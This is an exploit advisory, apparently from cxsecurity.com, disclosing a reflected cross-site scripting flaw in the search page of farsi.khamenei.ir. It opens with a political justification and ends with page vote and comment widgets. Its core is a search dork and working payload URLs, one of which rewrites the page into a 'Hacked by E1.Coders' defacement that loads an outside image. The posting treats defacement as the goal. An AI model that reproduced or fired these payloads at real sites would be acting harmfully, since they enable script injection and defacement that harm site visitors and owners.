Khameneie.ir XSS vulnerabilities

2022.10.23
ua E1.Coders (UA) ua
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: site:farsi.khamenei.ir/search-result?q="

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* confidential "Top Secret" This message is written to describe the security issue and is confidential and should not be included in the report This site belongs to the organization of the leader of the Islamic Republic of Iran "Khamenei". who ordered the killing of Mehsa Amini, a 22-year-old Iranian woman, and she was killed by the moral police, and the people protested in the streets, and now the Iranian police are trying to identify these people. This site has a security issue with an XSS vulnerability. We have reported many times to this site that it has a security problem and it has ignored our report. We want to definitely register and report this security issue -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ################################################## ################################################## ##################### # # # Exploit Title : Khameneie.ir has XSS vulnerabilities # # # # Author : E1.Coders # # # # Contact : E1.Coders [at] Mail [dot] RU # # # # Portal Link : khamenei.ir (https://farsi.khamenei.ir) # # # # Tested ON : All language version Host # # # # Security Risk : ~[Critical]~ # # # # Description : Description: All websites with this version used can be targeted # # # # DorK : "intext:"site:farsi.khamenei.ir/search-result?q=" # # # site:farsi.khamenei.ir/search-result?q=YOUR KEYWORD& # # # # ################################################## ################################################## ##################### Details : the vulnerable file is "book-archive" XSS Expl0iTs : https://farsi.khamenei.ir/search-result?q=%3CXSS%20SCRIPT%3E&nt=99,101,2,4,9,1,16, Dem0 : https://farsi.khamenei.ir/search-result?q=%3C/script%3E%3Cscript%3Edocument.documentElement.innerHTML=%22%3Ccenter%3E%3Ch1%3EHacked%20by%20E1.Coders%3C/h1%3E%3Cimg%20src=%27https://cybercrimemag.wpenginepowered.com/wp-content/uploads/2018/11/Keyboard-Typing-700x467.jpg%27%3E%3Ccenter%3E%3Ch2%3ERUSSIAN%20-%20BLACK%20-%HAT%20%3C/h2%3E%3C/center%3E%3Ch2%3ESECURITY_is_Low%20~Fuck~%3C/h2%3E%3C/center%3E%22%3C/script%3E&nt=99,101,2,4,9,1,16


See this note in RAW Version
Vote for this issue:
86%
14%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top